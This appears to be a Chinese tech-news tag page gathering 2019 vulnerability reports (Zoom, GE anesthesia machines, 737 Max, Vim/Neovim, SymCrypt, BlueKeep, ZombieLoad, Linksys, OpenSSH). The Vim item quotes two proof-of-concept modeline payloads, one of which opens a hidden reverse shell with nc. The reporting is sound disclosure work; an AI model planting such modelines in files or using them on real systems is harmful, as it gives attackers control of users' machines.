标签: 漏洞

苹果再发静默更新 删除其他存在 Zoom 漏洞软件的 Web 服务器

今天苹果向 The Verge 在内的多家媒体发出通知,表示已经向 Mac 设备发送静默安全更新,以删除 RingCentral 和 Zhumu 自动安装的软件。这些视频会议应用程序都使用了 Zoom 的技术,由于它们本质上都是白标签(White Labels),因此它们同样存在 Zoom 的安全漏洞。 具体来说就是它们可以安装辅助应用,在没有用户干预的情况下打开你的网络摄像头。即使卸载这些应用程序啊也不会删除这些辅助Web服务器,这意味着许多用户无法获得软件供应商的更新来解决问题。而解决这个问题的最佳方法就是苹果的介入,苹果计划为Zoom的所有合作伙伴解决这个问题。 Zoom发言人Priscilla McCarthy告诉TechCrunch:“我们很高兴与Apple合作测试此更新。我们希望今天解决Web服务器问题。我们感谢用户的耐心,因为我们会继续努力解决他们的问题。 本周早些时候,安全研究员Jonathan Leitschuh公开披露了在Mac电脑上Zoom视频会议应用中出现的一个严重零日漏洞。他已经证明,任何网站都可以在安装了Zoom应用的Mac电脑上打开视频通话。 这在一定程度上是可行的,因为Zoom应用在Mac电脑上安装了一个网络服务器用于接收普通浏览器不会接收的请求。事实上,即便卸载了Zoom, 网络服务器仍会持续存在,并且可以在不需要用户干预的情况下重新安装Zoom。   (稿源:cnBeta,封面源自网络。)

美国医院麻醉机、呼吸机现安全漏洞:极易遭到远程篡改

据外媒报道,安全研究人员发现,美国医院的麻醉机和呼吸机所使用的网络协议存在一个漏洞,如果利用该协议,这些医疗设备可能会遭到恶意篡改。来自医疗安全公司CyberMDX的研究人员表示,通用电气(GE)Aestiva和GE Aespire设备中使用的协议可以在连接到医院网络终端服务器时发送命令。 资料图 研究人员指出,这些指令可以关闭警报、改变记录,另外还可以被滥用来改变呼吸器和麻醉机中吸入气体的成分。 美国国土安全局在周二发布的一份报告称这些漏洞只需要低水平的技术就能遭到利用。 “这些设备使用的是一种专有协议,”CyberMDX研究主管Elad Luz说道,“计算这些命令非常简单。” Luz指出,其中一个命令会迫使设备使用仍存在于设备中的较老版协议,更糟的是,这些命令都不需要任何身份验证。 不过如果设备没有连接到网络那么就会安全得多。 据悉,CyberMDX则是在2018年10月底向GM披露了这些漏洞。后者表示,Aestiva和Aespire的7100和7900版在受影响范围内。据这家公司发言人表示,这一潜在的问题没有带来临床风险或直接的患者风险,麻醉设备本身也不存在脆弱性。不过这家公司拒绝透露受影响设备的具体数量,而2009年以后销售的系统则不再具备修改气体成分的能力。   (稿源:cnBeta,封面源自网络。)

发现新漏洞后 美国西南航空与联合航空公司延长了 737 Max 的停飞时间

外媒报道称,尽管美国联邦航空管理局(FAA)希望波音 737 Max 能够重拾客户的信任,但在其飞控系统曝出新的缺陷之后,西南与联合航空公司已经延长了该机的停飞时间。按照原计划,只要 737 Max 获得了 FAA 的重新认证,西南航空会从 9 月 2 日起重新执飞。但是现在,该公司已经把重启时间推迟到了 10 月 1 日之后。如此一来,西南航空每日 4000 趟的航班,将有大约 150 趟会受到影响。 波音 737 Max(图自:Boeing 官网,via TheVerge) 与此同时,美国联合航空公司原计划在 8 月 3 日重新执飞 737 Max 航班,但现在已被延长到至少 9 月 3 日。其在一份声明中称,7 月份每日有 40~45 趟航班受到影响,8 月份每日有 60 趟航班受到影响。 本月早些时候,美国航空公司将 737 Max 的停飞时间推迟到了至少 9 月 3 日之后。不过在 FAA 曝光了波音的最新缺陷之后,该公司并没有再次推迟这一时间表。 其发言人在一封电子邮件中表示:“我司团队将继续与 FAA、波音和飞行员协会合作,目前暂无额外的信息可与大家分享”。 今年 3 月,737 Max 陆续在全球被停飞,其中两架飞机在五个月内接连坠毁,共造成了 364 人的死亡。事后调查表明,两起事故都与 737 Max 上安装的机动特性增强系统(MCAS)的缺陷有关。 为提升燃油效率,波音为 737 Max 配备了更大的发动机,这对于抢占市场份额非常重要。然而 737 Max 的安装方式与旧款 737 机型有较大差别,使得飞机在某些情况下易发生失速。 MCAS 原本有助于缓解该问题,其被设计用于识别飞机的机头倾角(数据源自迎角创拿起)。如果抬得过高,系统会控制飞机自动俯冲以抵消失速影响。 然而现实是这会造成未经充分培训的飞行员的应对难度,波音又为了省钱(数百万美元)而省略了这一步。现在的问题是,即便已经对 MCAS 实施了软件修复,但波音还需数月时间来测试。 更糟糕的是,据彭博社报道,FAA 发现了 737 Max 计算机系统的另一个潜在缺陷,或导致飞行员很难通过模拟器的测试来掌握恢复正常飞行的方法。 FAA 要求波音解决这个问题,后者也迅速承认了这一缺陷。一名波音官员在周四接受路透社采访时称,预计软件修复要等到 9 月份才能完成,意味着各大航空公司的 737 Max 可能要等到 10 月才能恢复运营。   (稿源:cnBeta,封面源自网络。)

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

Google 研究员披露 Windows 10 0day 漏洞

安全研究员 Tavis Ormandy‏ 是谷歌 “Project Zero” 团队的一员,负责寻找 0day 漏洞。他公开了一个可利用的 Windows 漏洞,目前,微软仍处于修复过程中。 Tavis Ormandy 发推文说他已经发现了 Windows 核心加密库的安全问题,“微软承诺在 90 天内修复它,结果没有”。于是在第 91 天,Ormandy 选择了公开这个漏洞。 该漏洞实际上是 SymCrypt 中的一个错误,SymCrypt 是负责在 Windows 10 中实现非对称加密算法和在 Windows 8 中实现对称加密算法的核心加密库。Ormandy 发现,通过使用格式错误的数字证书,他可以强迫 SymCrypt 计算进入无限循环。这将有效地对 Windows 服务器执行拒绝服务(DoS)攻击,例如,运行使用 VPN 或 Microsoft Exchange Server 进行电子邮件和日历时所需的 IPsec 协议的服务。 Ormandy 还指出,“许多处理不受信任内容的软件(如防病毒软件)会在不受信任的数据上调用这些例程,这将导致它们陷入僵局。” 不过,他还是将其评为低严重性漏洞,同时补充说,该漏洞可以让人相对轻松地拆除整个 Windows 机群,因此值得注意。 Ormandy 发布的公告提供了漏洞的详细信息,以及可能导致拒绝服务的格式错误的证书示例。 如前所述,Project Zero 有 90 天的披露截止日期。Ormandy 于 3 月 13 日首次报告此漏洞,然后在 3 月 26 日,微软确认将发布安全公告,并在 6 月 11 日的 Patch Tuesday 中对此进行修复。Ormandy 认为,“这是 91 天,但在延长期内,所以它是可以接受的。” 6 月 11 日,微软安全响应中心(MSRC)表示“该修补程序今天不会发布,并且由于测试中发现问题,在 7 月发布之前也不会修补好”,于是 Ormandy 公开了这个漏洞。 公开的漏洞地址:https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 消息来源:Forbes   (稿源:开源中国,封面源自网络。)

WordPress 插件漏洞被黑客用于恶意重定向和弹窗

黑客们目前使用版本过时的 WP Live Chat Support 插件来攻击 WordPress 网站。他们将访问者重定向到恶意站点,或者不断显示弹窗和伪造的订阅信息。 本月初,Bleeping Computer 报道说8.0.7以前的版本受到了存储型 XSS 漏洞影响,此漏洞无需授权就可使用。这使得黑客能够将恶意 JavaScript 脚本注入某个受影响网站的多个页面。 由于攻击成本低,并且潜在受害人数量众多。黑客很快便乘虚而入。 来自 ZScaler 的 ThreatLabZ 研究室的调查人员们发现,攻击者们多次利用漏洞注入恶意 JavaScript脚本,引起“恶意重定向,弹窗和虚假订阅消息”。这一方法被用于至少47家网站,并且这一数字仍在增长。 例如,被攻击网站的用户会收到一则以“权力的游戏”为主题的广告,与寻求身份认证的弹窗。   根据 ZScaler 提供的 WhoIs 记录,这个IP地址指向一个印度的专用服务器。 网络罪犯在不断地寻找新的漏洞报告,以研究如何攻击那些缺少防护的网站。管理员们应该在补丁更新之后尽快安装。 大部分的攻击者一直在寻找新的机会,并且WordPress 插件经常是被瞄准的目标之一,因其网站管理员在一般情况下不会及时打上最新的补丁。就在昨天,一篇针对 Convert Plus 插件漏洞的文章指出,攻击者可以在网站上建立一个拥有管理员权限的账号。 此举不难实现,并且一次成功的攻击所带来的回报值得黑客们一试。尽管是商业性产品,但据统计,  Convert Plus 的主动安装次数已经接近十万次。所以黑客把那些插件未升至最新版本的网站作为攻击的目标也不足为奇了。   消息来源:Bleepingcomputer, 译者:xyj,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

时隔两周 仍有百万级联网设备未打上微软 BlueKeep 漏洞补丁

外媒 Threat Post 报道称,有研究人员发现,互联网上有百万级设备易受微软 BlueKeep 漏洞的影响,或为 WannaCry 之类的攻击敞开大门。据悉,该漏洞编号为 CVE-2019-0708,但微软已在本月早些时候的星期二补丁(Security Bulletin)中修复。遗憾的是,尽管系统管理员被要求尽快修复,但还是有大量设备暴露在公共互联网上。 (图自 @GreyNoiseIO,via Threat Post)   Errata Security 研究员 Robert Graham 周二警告称,经过分析,目前公网上仍有 100 万台左右的设备易受这个严重漏洞的影响。 受威胁的设备,很容易成为 WannaCry 之类的网络攻击的受害者。更糟糕的是,上周末的检测表明,专门针对这类系统的恶意扫描数量出现了激增。 据悉,微软 Windows 操作系统中的远程桌面服务,存在着重大的远程代码执行缺陷。其影响包括 Windows 7 / XP、Server 2003 / 2008 等在内的诸多版本。 (本次威胁影响大约 95 万台暴露于公网上的计算机)   因担心黑客已经熟练掌握勒索技能,BlueKeep 漏洞或引发又一轮严重的攻击。微软这次还是破例为 Windows XP / Server 2003 提供了星期二补丁。 WannaCry / NotPetya 引发的骚乱,并没有多去多久。而这次曝出的 BlueKeep 漏洞,有些类似于 2017 年快速传播的恶意攻击所使用的 EternalBlue 漏洞。 Ivanti 安全产品管理总监 Chris Goettl 亦在周二表示:“本次曝出的 BlueKeep 漏洞具有在全球范围内掀起另一轮 WannaCry 级别的恶意攻击的潜力”。 (3389 端口原本旨在提供可靠的远程桌面通信协议)   借助 Masscan Internet 等工具,Errata Security 的 Graham 对公网上的 3389 规模进行了大范围扫描,发现漏洞影响将近百万台设备,而黑客有可能在未来一两个月造成严重的破坏。 据悉,受影响的机器包括西门子的一些医疗设备,比如面向放射肿瘤科、实验室诊断、射线成像、医疗点诊断等应用的产品。 为此,西门子建议尽快为潜在受影响的设备打上补丁,并在必要时直接禁用 3389 端口的远程桌面连接(RDP)功能。   (稿源:cnBeta,封面源自网络。)

禁用超线程才能完全缓解 ZombieLoad ,但性能下降高达 40%

上周 Intel 曝出影响 2011 年以来几乎所有芯片的漏洞 ZombieLoad,利用该漏洞,攻击者可以对芯片发起边信道攻击,在同一 CPU 上执行恶意进程,进而获取 CPU 的微架构缓冲器中的存储器内容。 攻击者可以访问存储缓冲区,加载端口并填充缓冲区的陈旧内容,这些缓冲区可能包含属于另一个进程的数据或源自不同安全上下文的数据。因此,在用户空间进程之间、内核与用户空间之间、虚拟机之间或虚拟机与主机环境之间可能都会发生意外的内存泄露。 ZombieLoad 与其它推测性执行边信道攻击不同,因为攻击者无法定位特定数据。攻击者可以定期对缓冲区中的内容进行采样,但是在采集样本时无法控制缓冲区中存在的数据。因此,需要额外的工作来将数据收集并重建为有意义的数据集。这也是 ZombieLoad 比较复杂的地方。 虽然 ZombieLoad 得到有价值数据的成本比较高,但是各大公司都十分重视这个漏洞,毕竟它影响了 2011 年以来几乎所有芯片,打击范围十分广泛。 Intel 自己已经发布了微代码,从架构上缓解该问题,其它科技公司如苹果、微软与谷歌也都相继发布了补丁。 但同时也有一些公司认为光有补丁并没有什么作用,比如 Red Hat 认为在云场景上 ZombieLoad 危险很大,因为你完全无法控制相邻虚拟机中的用户正在运行的内容,云安全公司 Twistlock 的首席技术官 John Morello 也指出:“这个漏洞可能对密集的、多租户的公有云提供商产生最大的影响。” 另一边,Ubuntu 目前也已经给出了补丁,但是其在安全公告中表示,如果用户系统中有不受信任或潜在的恶意代码,则建议其禁用超线程功能。 如果您的处理器不支持超线程(也称为对称多线程(SMT)),则内核和相应的 Intel 微代码软件包更新将完全解决 MDS(ZombieLoad)漏洞。如果您的处理器支持超线程并且启用了超线程,则 MDS 不会完全缓解。 所以,如果想要完全缓解漏洞,你需要暂时放弃 CPU 的超线程能力。事实上,苹果和谷歌都已经警告 macOS 和 Chrome OS 用户禁用超线程可获得全面保护,并且谷歌现在默认从 Chrome OS 74 开始禁用超线程。 但是禁用超线程的性能代价实在有点高,结合对比一下 ZombieLoad 微代码与补丁对系统性能影响的数据: Intel 发言人表示,大部分打过补丁的设备在最坏的情况下可能会受到 3% 的性能影响,而在数据中心环境中可能会是 9%。 另一边,PostgreSQL 基准测试发现,禁用超线程后,性能下降了近 40%;Ngnix 基准测试的性能下降了约 34%;Zombieload 的研究人员表示禁用超线程会使某些工作负载的性能下降 30% 至 40%。 安全还是性能,如何选择呢?   (稿源:开源中国,封面源自网络。)

25000 台 Linksys 路由器可能泄露与之相连的任何设备的大量信息

可能泄露大量数据的自2014年一来就有的严重漏洞被暴露,未更改默认密码的Linksys路由器甚至可以帮助黑客在现实世界中物理定位设备和用户。研究人员Troy Mursch声称,目前使用的Linksys智能Wi-Fi路由器至少发现有25000个存在缺陷,这意味着黑客可以访问重要数据。在“网络威胁情报”公司的Bad Packets Report中写道,敏感信息正在泄露,尽管制造商正在否认这一点。 Linksys于2013年被Belkin收购 – 而后该公司于2018年又被富士康收购 – 富士康随后表示其员工未能重现Mursch的调查结果。 “我们使用最新的公开固件(默认设置)快速测试了Bad Packets标记的路由器型号,但无法重现[它],” Linksys在一份在线安全公告中表示,“这意味着它不可能让远程攻击者通过这种技术检索敏感信息。” Linksys进一步表示,该漏洞在2014年就得到修复。但是,Mursch并不同意,坚持认为这个安全风险依然存在。 “虽然[这个缺陷]据说是针对这个问题修补的,但我们的调查结果已经表明了其他情况,”Bad Packets说。 “在联系Linksys安全团队后,我们被告知要报告漏洞……在提交我们的调查结果后,审核人员确定问题是“不适用/不会修复”并随后关闭了这一报告。 如果您的路由器是以这种方式泄漏信息的,那么黑客可能获得的详细信息包括现在连接的每个设备的MAC地址。 它还可以包括设备名称,如“William’s iPhone”以及该设备是Mac、PC、iOS以及Android设备。 Mursch声称,MAC地址和Linksys智能Wi-Fi路由器的公共IP地址的组合可能意味着黑客可以对被攻击者的进行地理定位或跟踪。 但是,更容易和立即发现的是路由器的默认管理员密码是否已被更改。这个漏洞和Linksys / Belkin的响应首先由Ars Technica报告,其中指出受影响的路由器的数量似乎正在减少。在25617个初步报告之后,几天后重复测试显示有21401个易受攻击的设备还未与互联网上。 已报告受影响的Linksys路由器型号的完整列表位于Bad Packets站点上。   (稿源:cnBeta,封面源自网络。)

OpenSSH 8.0 发布,修复 SCP 存在 35 年的漏洞

OpenSSH 8.0 发布了,此版本缓解了 scp(1) 工具和协议漏洞 CVE-2019-6111,该漏洞此前我们之前报导过:知名文件传输协议 SCP 被曝存在 35 年历史的安全漏洞。 将文件从远程系统复制到本地目录时,SCP 客户端无法验证 SCP 服务器返回的对象是否与请求的东西一致,这使得攻击者可以使用恶意服务器控制的内容创建或破坏本地文件。 OpenSSH 8.0 的缓解措施添加了客户端检查,查看从服务器发送的文件名与命令行请求是否匹配。 SCP 协议已经过时,不灵活且不易修复,OpenSSH 官方建议使用更现代的协议进行文件传输,如 sftp 和 rsync。 此版本新特性包括: ssh(1)、ssh-agent(1)、ssh-add(1):PKCS#11 token 中添加对 ECDSA 密钥的支持。 ssh(1)、sshd(8):基于 Streamlined NTRU Prime 4591^761 和 X25519 的组合,添加实验性量子计算抗性密钥交换方法。 ssh-keygen(1):将默认 RSA 密钥大小增加到 3072 位。 ssh(1):允许“PKCS11Provider = none”覆盖 ssh_config 中 PKCS11Provider 指令的后续实例。 ssh(1):提示是否录制新主机密钥时,输入密钥指纹作为“yes”。 ssh-keygen(1):在单个命令行调用上签名多个证书时,允许自动递增证书序列号。 scp(1)、sftp(1):接受 -J 选项作为 scp 和 sftp 命令行上 ProxyJump 的别名。 ssh-agent(1)、ssh-pkcs11-helper(8)、ssh-add(1):接受“-v”命令行标志以增加输出的详细程度;将详细标志传递给子进程,例如从 ssh-agent 启动的 ssh-pkcs11-helper。 ssh-add(1):添加“-T”选项以允许通过执行签名和验证来测试代理中的密钥是否可用。 sshd(8):在 PAM 环境中暴露 $SSH_CONNECTION。 完整更新内容查看更新日志: http://www.openssh.com/txt/release-8.0   (稿源:开源中国,封面源自网络。)